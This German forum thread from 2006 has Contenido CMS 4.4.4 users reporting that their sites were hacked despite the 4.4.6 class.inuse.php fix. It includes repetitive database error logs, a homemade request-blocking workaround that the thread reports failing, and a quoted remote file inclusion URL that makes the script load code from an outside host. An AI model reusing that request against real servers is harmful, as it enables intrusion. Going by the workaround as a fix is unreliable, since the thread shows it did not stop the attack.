CONTENIDO Forum

Das Diskussionsforum zum Open Source Content Management System
https://forum.contenido.org/

4.4.4 gehackt trotz Fix von 4.4.6

https://forum.contenido.org/viewtopic.php?f=110&t=14407

Seite 1 von 1

4.4.4 gehackt trotz Fix von 4.4.6

Verfasst: Mo 30. Okt 2006, 11:33
von kypta
Eigentlich wähnte ich mich da auf der sicheren Seite. Ich habe bei einer 4.4.4 ganz eifach das gemacht, was beim 4.4.6 download steht: Es reicht zum Schließen der Sicherheitslücke vollkommen aus, die class.inuse.php zu ersetzen.

Heute hat mir mein Provider folgendes mitgeteilt:
Am 23.10.2006 kam ein Hackversuch via juniorcom.ch rein. Dabei wurde wohl eine Sicherheitsluecke in Ihrem CMS ausgenutzt, um Daten hochzuladen und auszufuehren: siehe Files in: http://meine.domain/cms/cache/
Well, im cache-Verzeichnis liegt jetzt eine Datei namens acz.tgz (614 KB). Der Inhalt ist laut Virenscanner der Virus Linux/Procfake.

Im Errorlog finde ich für den 23.10 keinen Eintrag. Jedoch am 14.10:
[14-Oct-2006 14:29:42] connect(server.meine.domain, juniorcom, $Password) failed.
[14-Oct-2006 14:29:42] next_record called with no query pending.
[14-Oct-2006 14:29:42] PHP Warning: mysql_connect(): Too many connections in /home/wz/textakad/meine.domain/conlib/db_mysql.inc on line 76
[14-Oct-2006 14:29:42] connect(server.meine.domain, juniorcom, $Password) failed.
[14-Oct-2006 14:29:42] next_record called with no query pending.
[14-Oct-2006 14:29:42] PHP Warning: mysql_connect(): Too many connections in /home/wz/textakad/meine.domain/conlib/db_mysql.inc on line 76
[14-Oct-2006 14:29:42] connect(server.meine.domain, juniorcom, $Password) failed.
[14-Oct-2006 14:29:42] next_record called with no query pending.
[14-Oct-2006 14:29:42] PHP Warning: mysql_connect(): Too many connections in /home/wz/textakad/meine.domain/conlib/db_mysql.inc on line 76
[14-Oct-2006 14:29:42] connect(server.meine.domain, juniorcom, $Password) failed.
[14-Oct-2006 14:29:42] next_record called with no query pending.
[14-Oct-2006 14:29:42] PHP Warning: mysql_connect(): Too many connections in /home/wz/textakad/meine.domain/conlib/db_mysql.inc on line 76
[14-Oct-2006 14:29:42] connect(server.meine.domain, juniorcom, $Password) failed.
[14-Oct-2006 14:29:42] PHP Warning: mysql_connect(): Too many connections in /home/wz/textakad/meine.domain/conlib/db_mysql.inc on line 76
[14-Oct-2006 14:29:42] connect(server.meine.domain, juniorcom, $Password) failed.
[14-Oct-2006 14:29:42] next_record called with no query pending.
[14-Oct-2006 14:29:42] PHP Warning: mysql_connect(): Too many connections in /home/wz/textakad/meine.domain/conlib/db_mysql.inc on line 76
[14-Oct-2006 14:29:42] connect(server.meine.domain, juniorcom, $Password) failed.
[14-Oct-2006 14:29:42] next_record called with no query pending.
[14-Oct-2006 14:29:42] PHP Warning: mysql_connect(): Too many connections in /home/wz/textakad/meine.domain/conlib/db_mysql.inc on line 76
[14-Oct-2006 14:29:42] connect(server.meine.domain, juniorcom, $Password) failed.
[14-Oct-2006 14:29:42] next_record called with no query pending.
[14-Oct-2006 14:29:42] PHP Warning: mysql_connect(): Too many connections in /home/wz/textakad/meine.domain/conlib/db_mysql.inc on line 76
[14-Oct-2006 14:29:42] connect(server.meine.domain, juniorcom, $Password) failed.
[14-Oct-2006 14:29:42] next_record called with no query pending.
[14-Oct-2006 14:29:42] PHP Warning: mysql_connect(): Too many connections in /home/wz/textakad/meine.domain/conlib/db_mysql.inc on line 76
[14-Oct-2006 14:29:42] connect(server.meine.domain, juniorcom, $Password) failed.
[14-Oct-2006 14:29:42] PHP Warning: mysql_connect(): Too many connections in /home/wz/textakad/meine.domain/conlib/db_mysql.inc on line 76
[14-Oct-2006 14:29:42] connect(server.meine.domain, juniorcom, $Password) failed.
[14-Oct-2006 14:29:42] lock() failed.
[14-Oct-2006 14:29:42] cannot lock jc_sequence - has it been created?
[14-Oct-2006 14:29:42] PHP Warning: mysql_connect(): Too many connections in /home/wz/textakad/meine.domain/conlib/db_mysql.inc on line 76
[14-Oct-2006 14:29:42] connect(server.meine.domain, juniorcom, $Password) failed.
[14-Oct-2006 14:29:42] PHP Warning: mysql_connect(): Too many connections in /home/wz/textakad/meine.domain/conlib/db_mysql.inc on line 76
[14-Oct-2006 14:29:42] connect(server.meine.domain, juniorcom, $Password) failed.
[14-Oct-2006 14:29:42] next_record called with no query pending.
[14-Oct-2006 14:29:42] PHP Warning: mysql_connect(): Too many connections in /home/wz/textakad/meine.domain/conlib/db_mysql.inc on line 76
[14-Oct-2006 14:29:42] connect(server.meine.domain, juniorcom, $Password) failed.
[14-Oct-2006 14:29:42] next_record called with no query pending.
[14-Oct-2006 14:29:42] PHP Warning: mysql_connect(): Too many connections in /home/wz/textakad/meine.domain/conlib/db_mysql.inc on line 76
[14-Oct-2006 14:29:42] connect(server.meine.domain, juniorcom, $Password) failed.
[14-Oct-2006 14:29:42] next_record called with no query pending.
[14-Oct-2006 14:29:42] PHP Warning: mysql_connect(): Too many connections in /home/wz/textakad/meine.domain/conlib/db_mysql.inc on line 76
[14-Oct-2006 14:29:42] connect(server.meine.domain, juniorcom, $Password) failed.
[14-Oct-2006 14:29:42] next_record called with no query pending.
[14-Oct-2006 14:29:42] PHP Warning: mysql_connect(): Too many connections in /home/wz/textakad/meine.domain/conlib/db_mysql.inc on line 76
[14-Oct-2006 14:29:42] connect(server.meine.domain, juniorcom, $Password) failed.
[14-Oct-2006 14:29:42] next_record called with no query pending.
Der Eintrag ist noch wesentlich länger - er widerholt sich aber ständig.

Ideen?

Re: 4.4.4 gehackt trotz Fix von 4.4.6

Verfasst: Mo 30. Okt 2006, 14:07
von emergence
die fehlermeldung aus dem errorlog.txt haben nichts damit zu tun...
Thomas hat geschrieben:Heute hat mir mein Provider folgendes mitgeteilt:
Am 23.10.2006 kam ein Hackversuch via juniorcom.ch rein. Dabei wurde wohl eine Sicherheitsluecke in Ihrem CMS ausgenutzt, um Daten hochzuladen und auszufuehren: siehe Files in: http://meine.domain/cms/cache/
ähm intressant wäre der einstiegspunkt..

sicherheitslücke die class.inuse.php zu ersetzen reicht nicht
-> http://www.contenido.org/forum/viewtopi ... 6719#66719

Gibt es eine Möglichkeit die Lücke zu schliessen ?

Verfasst: Di 5. Dez 2006, 16:55
von hgk
Ich hab in der class.inuse.php den folgenden Code gesetzt :

if ( $_REQUEST['cfg'] ) { exit; } // workaround remote hacking exploit

if ($_GET["cfg"] || $_POST["cfg"])
{
die();
}



aber es passierte laut Provider wieder:

/contenido/classes/class.inuse.php?cfg[path][contenido]=http://overburnhosting.com/sport/tusuk.htm

Über das Skript wurde ein externes Skript aufgerufen, so konnten Befehle auf
Ihrem Speicherplatz ausgeführt werden.

Bitte um Hilfe
Alle Zeiten sind UTC+01:00
Seite 1 von 1

Powered by phpBB® Forum Software © phpBB Limited

Deutsche Übersetzung durch phpBB.de